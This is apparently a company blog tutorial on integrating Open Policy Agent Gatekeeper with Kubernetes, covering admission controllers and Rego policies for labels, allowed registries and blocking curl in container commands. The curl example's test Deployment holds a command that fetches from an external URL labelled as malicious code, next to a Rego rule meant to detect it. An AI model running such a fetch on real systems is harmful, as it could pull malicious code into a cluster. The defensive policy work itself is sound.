Integrating Open Policy Agent (OPA) With Kubernetes

By Mohamed Ahmed
June 02, 2020

Explore how to integrate OPA with Kubernetes and see some examples of the power that this integration can bring to policy enforcement.

Related posts

Enforce Pod Security Policies In Kubernetes Using OPA

Integrate OPA Into Your Kubernetes Cluster Using Kube-mgmt

Open Policy Agent (OPA): Introducing Policy As Code

In a previous article, we introduced the Open Policy Agent (OPA). Understanding what OPA is and how it works is a prerequisite for following along with this article. As we discussed, the technology can be integrated with a myriad of systems and platforms, including Kubernetes. In this article, we’re going to explore how we can integrate OPA with Kubernetes and see some examples of the power that this integration can bring to policy enforcement in your environment.

OPA is deployed to Kubernetes as an admission controller. If you’re not familiar with admission controllers, let’s spend a few moments discussing their role.

What is An Admission Controller?

An admission controller is a code that intercepts requests to the Kubernetes API server before an object persists, but after authentication and authorization are performed. In other words, if you issue a request to the API server to create a new Deployment, and you’re an authenticated user who’s allowed to perform such an action, the admission controller may intercept and mutate, validate, or conduct both actions for this request. Admission controllers are compiled with the API server, hence they live in the same binary file and can be enabled using command-line flags. You can read more about them in the Kubernetes official documentation.

To better understand why admission controllers are used, consider the AlwaysPullImages admission controller. Let’s say that you’ve created a deployment object on the cluster where the containers pull an image called myprivateimage from the Gitlab registry, once this image is pulled and placed on a node, there’s nothing to prevent other pods (from different Deployments) from using the cached image (provided that the pod gets scheduled on the right node). Now, if this image is private, and its maintainer requires credentials to pull it from the registry, this security measure can easily be overridden by not having to authenticate and pull the image again from the registry. The AlwaysPullImages admission controller intercepts the Deployment creation request and modifies it so that pods are forced to pull their images from the remote repository whenever they’re (re)started.

OPA As An Admission Controller

When deploying OPA as an admission controller, there are many powerful constraints that you can enforce on your cluster. For example:

  • Enforce that pods must have a sidecar container. This sidecar container may perform auditing or logging tasks as required by your security policy.
  • Modify all resources to have specific annotations.
  • Mutate container images to always point to the corporate image registry.
  • Set node and pod affinity and anti-affinity selectors to Deployments.

The OPA Gatekeeper

The Gatekeeper is a relatively new project that was created to greatly enhance and facilitate integration between OPA and Kubernetes. So, what extra features does the Gatekeeper bring to plain OPA?

  • A parameterized policy library that can be extended.
  • A Kubernetes Custom Resource Definition (CRD) for creating the constraints.
  • Another CRD for extending the constraint (constraint template).
  • Auditing capability.

Installing The OPA Gatekeeper

Now that you have a basic understanding of OPA, admission controllers, and the OPA Gatekeeper, let’s see how we can install it to our Kubernetes cluster.

First, you need to make sure that you are running Kubernetes version 1.14 or later. You also need administrative permissions on the cluster.

Once you have the above requirements checked, the easiest way to install OPA Gatekeeper is by running the following command:

kubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper
/master/deploy/gatekeeper.yaml

There are other means of installation like building locally or using Helm. There is also a possibility of installing the software on earlier versions of Kubernetes. If you’re interested in those options, you can refer to the project documentation. As you can see from the command output, the YAML file created a namespace, a CRD, a service account with the necessary roles and role bindings, in addition to other components.

Example 01: Enforce Having A Specific Label In Any New Namespace

Whatever installation method you’ve chosen, you should have the Gatekeeper stack installed on your cluster so that you’re ready to enforce your policies. But before we show you some examples, let’s spend a few moments explaining how Gatekeeper works.

In order to define a constraint (policy library), you’ll need to define a Constraint Template. The purpose of the Constraint Template is to define both the Rego code that you use to enforce something and the schema that the constraint can be applied to. The schema is used to define the parameters that this CRD will accept. Think of it as the parameters that get passed to a function in programming languages. The following Constraint Template is taken from the official docs, it enforces that all labels defined by the constraint are present when a namespace is created:

apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
  name: k8srequiredlabels
spec:
  crd:
    spec:
      names:
        kind: K8sRequiredLabels
        listKind: K8sRequiredLabelsList
        plural: k8srequiredlabels
        singular: k8srequiredlabels
      validation:
        # Schema for the `parameters` field
        openAPIV3Schema:
          properties:
            labels:
              type: array
              items: string
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8srequiredlabels

        violation[{"msg": msg, "details": {"missing_labels": missing}}] {
          provided := {label | input.review.object.metadata.labels[label]}
          required := {label | label := input.parameters.labels[_]}
          missing := required - provided
          count(missing) > 0
          msg := sprintf("you must provide labels: %v", [missing])
        }

Let’s go through this template and delve a little deeper. A lot of the data provided in this template conforms to how the CRD was created, like the apiVersion and the kind. In the metadata and the spec, you define the name of the template including the singular and plural variations. The important part to notice here is the openAPIV3Schema (line 15). Here we define the parameters that this template will accept or the labels that the constraint may define. In the targets part, we get to define the actual Rego code that will get executed. Let’s take an in-depth look at it:

  • violation[{"msg": msg, "details": {"missing_labels": missing}}] should start any policy. It basically defines the message and the details that would be displayed to the user when the policy is violated.
  • violation here represents a rule. A rule is violated if its body evaluates to true. The body of a rule is enclosed in curly braces {}.
  • provided := {label | input.review.object.metadata.labels[label]} we define a variable called provided and we use it to hold the list of labels for the resource. The expression after the := can be read as follows: iterate through the dictionary of label=value that was provided in the request and extract the label part of it (the key). In Rego, this is called Comprehension. If you’ve programmed in Python before, it has a similar concept with the same name.
  • required := {label | label := input.parameters.labels[_]} the required labels are provided in the form of an array rather than a dictionary (the required labels are supplied through the CRD that we’ll create next). Again, we define a variable called required that holds a list of the labels that we require to be in the resource. The expression can be read as follows: iterate through all the items in the labels array and assign the result to required.
  • missing := required - provided now that we have two arrays: one containing the required labels and one containing the provided ones. The expression creates an array with the items found in required but not found in provided.
  • count(missing) > 0 if there are more than zero items in that difference array, then this means that we have one or more required labels that aren't there and this is a violation of the policy.
  • msg := sprintf("you must provide labels: %v", [missing]) since it’s a violation, we define the msg variable that’s displayed in the very first line of the violation rule. The message is a custom phrase that’s displayed to the client.
  • Undoubtedly, Rego can be hard to understand at first. You can always use the Rego Playground tool to test and understand how the policy works. So, in our example, we can add the policy to the main panel. In the INPUT panel, we can mimic the request sent by Kubernetes as follows:
{
    "review": {
        "object": {
            "metadata": {
                "labels": {
                    "app":"web",
                    "tier":"front"
                }
            }
        }
    },
    "parameters": {
        "labels": [
            "gatekeeper"
        ]
    }
}

Notice that we intentionally ignored adding the required label in the provided array in order to violate the policy. Now, hit the Evaluate button and have a look at the OUTPUT panel to see the JSON object that Rego replied with.

You can apply the above configuration to your cluster using the following command:

kubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper/master/demo
/basic/templates/k8srequiredlabels_template.yaml

Once we have the Constraint Template defined, we can create our constraint that’s based on our template:

apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sRequiredLabels
metadata:
  name: ns-must-have-gk
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Namespace"]
  parameters:
    labels: ["gatekeeper"]

You can have several Constraint Templates defined on your cluster. But none of them are activated unless a Constraint that uses one of the templates is created. In the above configuration, we define a Constraint that uses the K8sRequiredLabels.

  • Notice that the kind must match the kind value defined in the Constraint Template.
  • In the kinds part, you define which Kubernetes resource this policy applies to. In our case, we’re stating that any apiGroup that has the Namespace kind is a valid match.
  • Finally, the parameters part expects an array of labels that the policy would check if they exist on the namespace. In our case, we need to ensure that any namespace must have the gatekeeper label attached to it.

Applying this definition creates a JSON message that is a lot similar to the one we used with the Rego playground. Use the following command to apply this definition:

kubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper/master/demo
/basic/constraints/all_ns_must_have_gatekeeper.yaml

Now, let’s test this policy by creating a YAML file that deploys a new namespace called mynamespace. The YAML file doesn’t provide any labels to the namespace, it should look like this:

apiVersion: v1
kind: Namespace
metadata:
  name: mynamespace

Let’s try to apply this YAML file to our cluster:

$ kubectl apply -f namespace.yaml
Error from server ([denied by ns-must-have-gk] you must provide labels: {"gatekeeper"}): 
error when creating "namespace.yaml": admission webhook "validation.gatekeeper.sh" 
denied the request: [denied by ns-must-have-gk] you must provide labels: {"gatekeeper"}

As you can see, Kubernetes refused to create the namespace although the YAML file is perfectly valid. The reason is that we didn’t abide by the OPA Gatekeeper constraint and added a label called “gatekeeper” to the namespace definition. Let’s modify the YAML file to look as follows:

apiVersion: v1
kind: Namespace
metadata:
  name: mynamespace
  labels:
    gatekeeper: OPA

If we apply the above definition, the namespace will be created successfully. Notice that the policy is looking for the gatekeeper label, but it doesn’t care about its value. So, in our case, we added the gatekeeper and set its value to OPA, but we could’ve set it to any other value and the Gatekeeper wouldn’t have complained.

Example 02: Images Must Come From gcr.io Only

A common requirement in many organizations is that users shouldn’t be able to pull and run Docker images from any old registry. The reason is that they might accidentally pull a bogus image which may compromise the cluster’s security. Other regulations dictate that all images must come from the company’s private repository to guarantee that all the security measures and tests are applied. Whatever the reason for your requirement, OPA Gatekeeper can help you out.

Start by creating the Constraint Template - again, this template defines which parameters you need to define as well as the actual Rego code that will do the validation. The k8srequiredregistry_template.yaml should look as follows:

apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
  name: k8srequiredregistry
spec:
  crd:
    spec:
      names:
        kind: K8sRequiredRegistry
      validation:
        # Schema for the `parameters` field
        openAPIV3Schema:
          properties:
            image:
              type: string
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8srequiredregistry
        violation[{"msg": msg, "details": {"Registry should be": required}}] {
          input.review.object.kind == "Pod"
          some i
          image := input.review.object.spec.containers[i].image
          required := input.parameters.registry
          not startswith(image,required)
          msg := sprintf("Forbidden registry: %v", [image])
        }

If you take a closer look at this code, you’ll notice that it’s very similar to the one used in the first example, with a few differences:

  1. The name and kind in the template has changed. Notice that the kind should always use the Camel Case.
  2. In the schema part, we state that the parameter should be called image and it’s of type string.
  3. Finally, we define our Rego code. Let’s explain it line by line.
    • The violation line is standard. It specifies what messages the user should see when the rule is violated.
    • input.review.object.kind == "Pod" This rule should only be applied to Pod objects.
    • some i defines a variable i.
    • image := input.review.object.spec.containers[i].image
      the YAML path to the image. Notice that we’re traversing the containers array using the i variable. For example, if we have two containers, then we validate containers[0] and containers[1].
    • required := input.parameters.registry we define a variable that holds the registry name that we’ll pass along.
    • not startswith(image,required) we use the startswith built-in function to test whether the image name starts with the registry name that we require.
    • msg := sprintf("Forbidden registry: %v", [image]) finally, an informative message to the user stating the reason why the images they selected could not be pulled.

Apply the template definition using

kubectl apply -f k8srequiredregistry_template.yaml.

Now, let’s create our template. The all_images_must_come_from_gcr.yaml file should look as follows:

apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sRequiredRegistry
metadata:
  name: images-must-come-from-gcr
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
  parameters:
    registry: "gcr.io/"

We specify that we need this constraint applied to Pods only and we pass the registry name that we need the images to be pulled from.

Apply the constraint definition:

kubectl apply -f all_images_must_come_from_gcr.yaml

Now, let’s test our constraint by creating a Deployment object that pulls the container image from gcr.io (should pass the constraint). Our sample.yaml file should look as follows:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: busybox
spec:
  selector:
    matchLabels:
      app: busybox
  replicas: 1
  template:
    metadata:
      labels:
        app: busybox
    spec:
      containers:
      - name: busybox
        image: gcr.io/google-containers/busybox
        command:
        - sh
        - -c
        - sleep 1000000

A traditional Deployment that creates a Pod with a busybox container. Notice that we use the busybox image version pulled from gcr.io. Apply this definition by issuing kubectl apply -f sample.yaml. Next, double-check that you have the busybox pod running:

$ kubectl get pods
NAME                       READY   STATUS    RESTARTS   AGE
busybox-6d4b8cdb8f-rmlnn   1/1     Running   0          10s

Now, let’s say that someone with access to this deployment file decided to use the busybox image that comes from Docker Hub:

  • First, we need to delete this Deployment to better see what happens: kubectl delete deployment busybox
  • Change the image name in the sample.yaml file to be image: busybox
  • Apply the modified definition:
    kubectl apply -f sample.yaml

Notice that you won’t get any error messages, but if you list the running pods, you’ll find that none were created:

$ kubectl get pods
No resources found in default namespace.

To see what happened, we need to get the status of the deployment:

kubectl get deployments busybox -o yaml

There will be a lot of lines, but we’re interested in the last few:

message: 'admission webhook "validation.gatekeeper.sh" denied the request: [denied
      by images-must-come-from-gcr] Forbidden registry: busybox'

When applying the constraint definition, for example, myconstraint.yaml, you may see a slightly cryptic error:

error: unable to recognize "myconstraint.yaml": no matches <strong>for</strong> 
kind "myconstraint" <strong>in</strong> version "constraints.gatekeeper.sh/v1beta1.

The cause of this error is not in the constraint file, but rather in the template file. It means that there is something wrong with the Rego code defined there. Unfortunately, if the Redo code contained flaws, the API server will not complain when you post the template file. But you’ll see the above error when you try to apply the constraint definition. Now, to find out what went wrong with the code you have one of two options:

First Option:

Get the status of the template. For example:

$ kubectl get -f k8srequiredregistry_template.yaml -o yaml
status:
  byPod:
  - errors:
    - code: ingest_error
      message: "Could not ingest Rego: 1 error occurred: __modset_templates
[\"admission.k8s.gatekeeper.sh\"]
[\"K8sRequiredRegistry\"]_idx_0:8:
        rego_type_error: startswith: too few arguments\n\thave: (any)\n\twant: (string,
        string, boolean)"
    id: gatekeeper-controller-manager-cdd47c5bd-smw6w
    observedGeneration: 2

The status part will be the last part of the output and it will give you the error message that occurred when trying to run the Rego code.

Second Option:

Go through the Rego Playground where you copy the Rego code and paste it in the panel and press the Evaluate button. For example:

Integrating_Open_Policy_Agent_(OPA)_With_Kubernetes_1.webp

Create Your Own Constraint Step By Step

So far we’ve seen two examples that demonstrate the power of OPA Gatekeeper and how you can use it to impose different kinds of rules than the ones provided by RBAC. Let’s see how you can create a constraint from scratch. So far, we’ve learned that for a constraint to be applied you need a template object and a constraint object that uses that template.

Step 1: Define the Policy Purpose

Before you start writing code, you should carefully define the purpose of your policy. Perhaps a user accidentally downloaded a malicious script using curl and you want to prevent any similar future incidents. You’ve decided to enforce a policy that denies using curl in the command part of the container.

Step 2: Obtain the JSON Object Sent to the OPA Gatekeeper

To be able to effectively run the Rego code in the playground and try different approaches, you should have the raw JSON object that the API server sends to the admission controller. We can obtain this object using the following procedure:

  1. Create a template that denies all requests, and provides the review object in the output message. The k8sdenyall_template.yaml file should look as follows:
    
    apiVersion: templates.gatekeeper.sh/v1beta1
    kind: ConstraintTemplate
    metadata:
      name: k8sdenyall
    spec:
      crd:
        spec:
          names:
            kind: K8sDenyAll
      targets:
        - target: admission.k8s.gatekeeper.sh
          rego: |
            package k8sdenyall
    
            violation[{"msg": msg}] {
              msg := sprintf("REVIEW OBJECT: %v", [input.review])
            }
    
  2. Create a constraint that uses that template, the deny-all-pods.yaml file should look as follows:
    apiVersion: constraints.gatekeeper.sh/v1beta1
    kind: K8sDenyAll
    metadata:
      name: deny-all-namespaces
    spec:
      match:
        kinds:
          - apiGroups: [""]
            kinds: ["Pod"]
    
  3. Modify the busybox deployment that we used earlier to contain curl as part of the command property of the container. The sample.yaml file should look as follows:
    apiVersion: apps/v1
    kind: Deployment
    metadata:
      name: busybox
    spec:
      selector:
        matchLabels:
          app: busybox
      replicas: 1 
      template:
        metadata:
          labels:
            app: busybox
        spec:
          containers:
          - name: busybox
            image: busybox
            command:
            - sh
            - -c
            - curl
            - "http://xksqu4mj.fri3nds.in/tools/clay" # a link containing malicious code
            - sleep 1000000
    
  4. Apply this definition. Of course, no pods will be created as we’re denying and preventing this action. Take a look at the deployment status to get the input.review object:
    kubectl get deployment busybox -o yaml
    

Step 3: Write the Rego Code in the Playground

Copy the input.review JSON object from the output in Step 02. The JSON code after "REVIEW OBJECT: ". Paste the code in the INPUT panel of the Rego playground. It should look as follows:

Integrating_Open_Policy_Agent_(OPA)_With_Kubernetes_2.png

Now that we have the INPUT object ready, we can start writing the following code in the main panel:

package k8savoidmalscript
violation[{"msg": msg, "details": {"Unallowed code detected": code}}] {
  code := "curl"
  input.object.kind == "Pod"
  input.object.spec.containers[_].command[_] == code
  msg := sprintf("%v is not allowed:", [code])
}
  • The violation contains the message that you need to display to users that added curl to the command of their containers.
  • We create a variable, code, and assign “curl” to it. Notice that we’re doing this for testing purposes. We need to replace this part with code:= input.parameters.code when we write the template.
  • We ensure that the object mentioned in the request is Pod.
  • input.object.spec.containers[_].command[_] == code here we’re traversing the JSON tree to reach our target: the containers array. However, the containers array contains another array that we’re interested in: the command. In other programming languages, iterating through two nested arrays involves creating two nested loops with two different iterator variables. But Rego makes this extremely simple by using the underscore (_) character. Rego automatically understands that it should recursively iterate through this array of arrays (we may have many containers each with a commands array). As soon as this statement is true (the curl string was found in one of the containers’ commands) the iteration stops and the statement evaluates to true. Notice that we are referring to the object here as input.object, where input is the code in the input pane (the root). However, when we write this code in the template we should refer to it as input.review.object. The reason for that is we copied the JSON contents under the review node.
  • msg := sprintf("%v is not allowed:", [code]) finally we define the msg variable that will hold the message that we want displayed to the client.

Step 4: Deploy the Template and the Constraint Files

As usual, we’ll need a template file and a constraint that uses the template. First, let’s delete the existing deny-all template:

kubectl delete -f k8sdenyall_template.yaml

Next, our template file should look as follows:

apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
  name: k8savoidmalscript
spec:
  crd:
    spec:
      names:
        kind: K8sAvoidMalScript
      validation:
        # Schema for the `parameters` field
        openAPIV3Schema:
          properties:
            image:
              type: string
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8savoidmalscript
        violation[{"msg": msg, "details": {"Unallowed code detected": code}}] {
          code := "curl"
          input.review.object.kind == "Pod"
          input.review.object.spec.containers[_].command[_] == input.parameters.code
          msg := sprintf("%v is not allowed:", [code])
        }

Notice the changes that we made to the Rego code that were mentioned in the previous step.

Apply the above definition to the cluster, and create the constraint file as follows:

apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sAvoidMalScript
metadata:
  name: prevent-malicious-code
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
  parameters:
    code: "curl"

Apply this definition as well.

Finally, let’s try to create our deployment (if you have an existing busybox deployment you may want to delete it first):

kubectl apply -f sample.yaml

You should notice that no pods were created as a result. Let’s get the status of the deployment:

kubectl get deployments busybox -o yaml
- lastTransitionTime: "2020-05-03T13:08:41Z"
    lastUpdateTime: "2020-05-03T13:08:41Z"
    message: 'admission webhook "validation.gatekeeper.sh" denied the request: [denied
      by prevent-malicious-code] curl is not allowed:'
    reason: FailedCreate
    status: "True"
    type: ReplicaFailure

You may want to make sure that you can still create deployments that do not have curl in the containers’ command array by deleting the deployment, modifying the file, and applying the definition. You should see the busybox pod running as normal.

TL;DR

  • An admission controller is part of the API server’s code. It’s enabled on-demand using a command-line argument for the API server’s binary.
  • The admission controller intercepts requests arriving at the API to create or modify objects before the object is persisted.
  • The Open Policy Agent (OPA) can be integrated with Kubernetes through a project called OPA Gatekeeper. The project aims at streamlining the process of creating OPA policies through Custom Resource Definitions (CRDs).
  • To create a policy that OPA Gatekeeper understands, you need a template CRD and a constraint that uses this template.
  • The template contains all the necessary information for the constraint to work including the type of object that it applies to, and (optionally) the parameters that it should supply.
  • Once the template and constraint are applied to the cluster, you can determine the error message that the OPA Gatekeeper replied with by examining the status of the controller in question (for example, the Deployment).
  • OPA uses the Rego language to define the policies.
  • To create a new policy, it’s highly recommended that you try it out first on the Rego Playground web application.
  • The Rego Playground needs an INPUT JSON object to validate the policy. You can obtain this object by creating a policy that denies all actions and outputs the request object as a message.

Weave GitOps easily integrates into enterprise SSO to provide fine grained roles based access control (RBAC) to clusters and their assets. Try it Today!

Get Started

Related posts

Enforce Pod Security Policies In Kubernetes Using OPA

Integrate OPA Into Your Kubernetes Cluster Using Kube-mgmt

Open Policy Agent (OPA): Introducing Policy As Code

Whitepaper: Trusted Delivery with GitOps and Policy as Code

Download our latest whitepaper and learn how automated security and compliance checks, in the form of policy as code, make automated continuous deployments safe and secure.

Download your Copy